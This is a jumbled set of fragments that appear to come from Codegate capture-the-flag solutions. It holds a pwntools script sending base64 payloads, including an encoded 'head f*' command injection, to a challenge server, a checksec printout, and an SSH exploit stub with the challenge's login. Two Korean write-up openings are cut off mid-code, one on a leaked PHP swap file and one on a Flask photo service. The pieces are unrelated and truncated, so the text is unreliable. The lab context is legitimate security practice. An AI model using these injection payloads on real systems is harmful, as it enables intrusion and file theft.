| from pwn import * | |
| r = remote("110.10.212.138", 19091) | |
| r.sendline("TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA") | |
| r.sendline("YQ==") | |
| r.sendline("YQAAAAA=") | |
| r.sendline("head f*".encode("base64")) | |
| r.interactive() |
| """ | |
| >>> e = ELF("./babypwn") | |
| [*] '/media/psf/Home/junoim/3onedayonepwn/codegate/bp/babypwn' | |
| Arch: i386-32-little | |
| RELRO: Partial RELRO | |
| Stack: Canary found | |
| NX: NX enabled | |
| PIE: No PIE | |
| """ |
| from pwn import * | |
| import time | |
| s = ssh(host="110.10.212.133", user="hunting", port=5556, password="hunting") | |
| rand = ssh(host="110.10.212.133", user="hunting", port=5556, password="hunting") | |
| cnt = 0 | |
| r = s.process("./hunting", env = {}) |
한국인 중에 푼사람이 저희밖에 없기에 한국어로 풀이를 작성합니다.
링크에 접속하게 되면 간단한 zip cracking online 사이트란것을 알 수 있습니다.
아무것도 없습니다.. 스캐닝 툴을 돌려도 나왔겠지만 용진이형(adm1nkyj)이 게싱으로 swp파일을 가져왔습니다.
// .index.php.swp
<?php
if(!empty($_FILES['zip']['tmp_name']) and !empty($_FILES['dict']['tmp_name'])) {
한국인 중에 푼사람이 저희밖에 없기에 한국어로 풀이를 작성합니다.
소스코드와 링크가 제공되어있습니다. Flask로 작성되어진 간단한 온라인 사진관리 서비스입니다.
def h(s):
from hashlib import md5
return md5(s).hexdigest()
open('data/{}.py'.format(h(username)), 'w').write("imgs = {}".format(repr([])))